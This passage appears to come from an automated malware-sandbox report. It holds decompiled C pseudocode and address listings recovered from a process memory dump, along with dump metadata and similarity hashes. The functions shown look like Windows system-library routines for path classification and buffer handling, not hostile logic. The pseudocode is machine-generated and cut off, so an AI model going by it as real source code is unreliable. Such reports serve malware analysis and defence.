														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E02ACF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E02ACF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E02ACF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E02ACFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E02ACFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E02ACF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E02ACF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E02B54CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E02ADD130(_t427, _t494, _t511);
				}
			}

0x02b55ba5
0x02b55baa
0x02b55baf
0x02b55bb4
0x02b55bb6
0x02b55bbc
0x02b55bbe
0x02b55bc4
0x02b55bcd
0x02b55bd3
0x02b55bd6
0x02b55bdc
0x02b55be0
0x02b55be3
0x02b55beb
0x02b55bf2
0x02b55bf8
0x02b55bfe
0x02b55c04
0x02b55c0e
0x02b55c18
0x02b55c1f
0x02b55c25
0x02b55c2a
0x02b55c2c
0x02b55c32
0x02b55c3a
0x02b55c3f
0x02b55c42
0x02b55c48
0x02b55c5b
0x02b55c5b
0x02b55c2c
0x02b55cb7
0x02b55cb9
0x02b55cbf
0x02b55cc2
0x02b55cca
0x02b55ccb
0x02b55ccb
0x02b55cd1
0x02b55cd7
0x02b55cda
0x02b55ce1
0x02b55ce4
0x02b55ce7
0x02b55ced
0x02b55cf3
0x02b55cf9
0x02b55cff
0x02b55d08
0x02b55d0a
0x02b55d0e
0x02b55d10
0x00000000
0x00000000
0x02b55d16
0x02b55d1a
0x00000000
0x00000000
0x02b55d20
0x02b55d22
0x02b55d25
0x02b55d2f
0x02b55d2f
0x02b55d33
0x02b55d3d
0x02b55d49
0x02b55d4b
0x00000000
0x00000000
0x02b55d5a
0x02b55d5d
0x02b55d60
0x00000000
0x00000000
0x02b55d66
0x02b55d69
0x00000000
0x00000000
0x02b55d6f
0x02b55d6f
0x02b55d73
0x02b55d79
0x02b55d7f
0x02b55d86
0x02b55d95
0x02b55d98
0x02b55dba
0x02b55dcb
0x02b55dce
0x02b55dd3
0x02b55dd6
0x02b55dd8
0x02b55de6
0x02b55dec
0x02b55dee
0x02b55df1
0x02b55df3
0x02b5635a
0x02b5635a
0x00000000
0x02b5635a
0x02b55dfe
0x02b55e02
0x02b55e05
0x02b55e07
0x02b55e10
0x02b55e13
0x02b55e1b
0x02b55e1c
0x02b55e21
0x02b55e22
0x02b55e23
0x02b55e25
0x02b55e2a
0x02b55e2c
0x02b55e2e
0x02b55e36
0x02b55e39
0x02b55e42
0x02b55e47
0x02b55e4d
0x02b55e54
0x02b55e54
0x02b55e54
0x02b55e2e
0x02b55e5c
0x02b55e5f
0x02b55e62
0x02b55e64
0x02b55e6b
0x02b55e70
0x02b55e7a
0x02b55e7a
0x02b55e7a
0x02b55e6b
0x02b55e7e
0x02b55e7f
0x02b55e7f
0x02b55e81
0x02b55e87
0x02b55e8b
0x02b55e8c
0x02b55e8c
0x02b55e8c
0x02b55e9a
0x02b55e9c
0x02b55ea2
0x02b55ea6
0x02b55f50
0x02b55f50
0x02b55f57
0x02b55f66
0x02b55f66
0x02b55f66
0x02b55f68
0x02b55f6a
0x02b563d0
0x00000000
0x02b55f70
0x02b55f70
0x02b55f91
0x02b55f9c
0x02b55f9e
0x02b55fa4
0x02b55fa6
0x02b5638c
0x02b56392
0x02b563a1
0x02b563a7
0x02b563af
0x02b563af
0x02b563bd
0x02b563d8
0x00000000
0x02b563d8
0x02b55fac
0x02b55fb2
0x02b55fb4
0x02b55fbd
0x02b55fc6
0x02b55fce
0x02b55fd4
0x02b55fdc
0x02b55fec
0x02b55fed
0x02b55fee
0x02b55fef
0x02b55ff9
0x02b55ffa
0x02b55ffb
0x02b55ffc
0x02b56000
0x02b56004
0x02b56012
0x02b56012
0x02b56018
0x02b56019
0x02b5601a
0x02b5601b
0x02b5601c
0x02b56020
0x02b56059
0x02b5605c
0x02b56061
0x02b56061
0x02b56022
0x02b56022
0x02b56022
0x02b56025
0x02b5602a
0x02b5602b
0x02b56031
0x02b56037
0x02b56038
0x02b5603e
0x02b56048
0x02b56049
0x02b5604a
0x02b5604b
0x02b5604c
0x02b5604d
0x02b56053
0x02b56054
0x02b56054
0x02b56062
0x02b56065
0x02b56067
0x02b5606a
0x02b56070
0x02b56075
0x02b56076
0x02b56081
0x02b56087
0x02b56095
0x02b56099
0x02b5609e
0x02b560a4
0x02b560ae
0x02b560b0
0x02b560b3
0x02b560b6
0x02b560b8
0x02b560ba
0x02b560ba
0x02b560ba
0x02b560ba
0x02b560be
0x02b560c0
0x02b560c5
0x02b560c5
0x02b560c5
0x02b560c6
0x02b560cd
0x02b56114
0x02b560cf
0x02b560cf
0x02b560d4
0x02b560d5
0x02b560da
0x02b560db
0x02b560e1
0x02b560e2
0x02b560e8
0x02b560f8
0x02b560fd
0x02b560fe
0x02b56102
0x02b56104
0x02b56107
0x02b56109
0x02b5610b
0x02b5610b
0x02b5610b
0x02b5610b
0x02b5610f
0x02b5610f
0x02b56117
0x02b5611a
0x02b5611f
0x02b56125
0x02b56134
0x02b56139
0x02b5613f
0x02b56146
0x02b56148
0x02b5614b
0x02b5614d
0x02b5614f
0x02b5614f
0x02b5614f
0x02b5614f
0x02b56153
0x02b56159
0x02b56159
0x02b5615c
0x02b56163
0x02b56169
0x02b5616c
0x02b56172
0x02b56181
0x02b56186
0x02b56187
0x02b5618b
0x02b56191
0x02b56195
0x02b561a3
0x02b561bb
0x02b561c0
0x02b561c3
0x02b561cc
0x02b561d0
0x02b561dc
0x02b561de
0x02b561e1
0x02b561e4
0x02b561e6
0x02b561e8
0x02b561e8
0x02b561e8
0x02b561e8
0x02b561e6
0x02b561ec
0x02b561f3
0x02b56203
0x02b56209
0x02b5620a
0x02b56216
0x02b5621d
0x02b56227
0x02b56241
0x02b56246
0x02b5624c
0x02b56257
0x02b56259
0x02b5625c
0x02b5625e
0x02b56260
0x02b56260
0x02b56260
0x02b56260
0x02b5625e
0x02b56264
0x02b56267
0x02b56269
0x02b56315
0x02b56315
0x02b5631b
0x02b5631e
0x02b56324
0x02b56327
0x02b5632f
0x02b56330
0x02b56333
0x02b5633a
0x02b5633c
0x02b56335
0x02b56335
0x02b56335
0x02b5633f
0x02b56342
0x02b5634c
0x02b56352
0x02b56355
0x02b56355
0x02b56359
0x00000000
0x02b5626f
0x02b56275
0x02b56275
0x02b56278
0x02b5627e
0x02b5627e
0x02b56281
0x02b56287
0x02b5628d
0x02b56298
0x02b5629c
0x02b562a2
0x02b5629e
0x02b5629e
0x02b5629e
0x02b562a7
0x02b562a7
0x02b562aa
0x02b562b0
0x02b562f0
0x02b562f0
0x02b562f2
0x02b562f8
0x02b562fd
0x02b562b2
0x02b562b2
0x02b562b2
0x02b562b5
0x02b562dd
0x02b562e2
0x02b562e5
0x02b562b7
0x02b562b8
0x02b562bb
0x02b562bd
0x02b562c0
0x02b562c4
0x02b562cd
0x02b562cd
0x02b562c0
0x02b562bb
0x02b562b5
0x02b56302
0x02b56303
0x02b56305
0x02b56305
0x02b56305
0x02b5630c
0x02b5630c
0x00000000
0x02b5627e
0x02b56269
0x02b55eac
0x02b55ebb
0x02b55ebe
0x02b55ecb
0x02b55ecb
0x02b55ece
0x02b55ece
0x02b55ed4
0x02b55ed7
0x02b55ed9
0x02b55edb
0x02b55edb
0x02b55ee1
0x02b55ee1
0x02b55ee3
0x02b55f20
0x02b55f20
0x02b55ee5
0x02b55ee5
0x02b55ee5
0x02b55ee8
0x02b55f11
0x02b55f18
0x02b55eea
0x02b55eea
0x02b55eed
0x02b55ef2
0x02b55ef8
0x02b55efb
0x02b55f0a
0x02b55f0a
0x02b55eed
0x02b55ee8
0x02b55f22
0x02b55f28
0x00000000
0x00000000
0x02b55f30
0x02b55f31
0x02b55f37
0x02b55f3a
0x02b55f3d
0x02b55f44
0x00000000
0x00000000
0x00000000
0x02b55f46
0x02b55f48
0x02b55f4d
0x00000000
0x02b55f4d
0x02b55dda
0x02b55ddf
0x00000000
0x02b55ddf
0x02b55dd8
0x02b55da7
0x02b55da9
0x02b55dac
0x02b55dae
0x00000000
0x02b55db4
0x02b55db4
0x00000000
0x02b55db4
0x02b55dae
0x02b55d88
0x02b55d8d
0x02b56363
0x02b56369
0x02b5636a
0x02b56370
0x02b56372
0x02b5637a
0x02b5637b
0x02b5637d
0x00000000
0x00000000
0x02b5637f
0x02b56385
0x00000000
0x02b56385
0x02b55d38
0x02b55d3b
0x00000000
0x00000000
0x00000000
0x02b55d3b
0x02b55d27
0x02b55d29
0x00000000
0x00000000
0x00000000
0x02b56360
0x00000000
0x02b56360
0x02b55c10
0x02b55c10
0x02b563da
0x02b563e5
0x02b563e5

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba13a5479eafa9d0628cabd0d1d5f734031d1007500c98209cddf5f9d3af6b8
Instruction ID: 19957eb37c9adaf0c13f0007d200e563638eda41639d1adc538ecbb0b258b3be
Opcode Fuzzy Hash: 3ba13a5479eafa9d0628cabd0d1d5f734031d1007500c98209cddf5f9d3af6b8
Instruction Fuzzy Hash: 6B424875D00229CFDB24CF68C880BA9B7B5FF49304F5481EAD95DAB242E774A985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02AA4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02AA4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x2b7d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E02ABF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E02AA6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L02AA4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E02AA6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M02AA45F8))) {
												case 0:
													_v568 = 0x2a61078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x2a611c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L02AA4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E02ACF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E02ACF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E02A852A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E02A9EB70(1, 0x2b779a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E02A9AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E02AC95D0();
																			L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E02ACB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
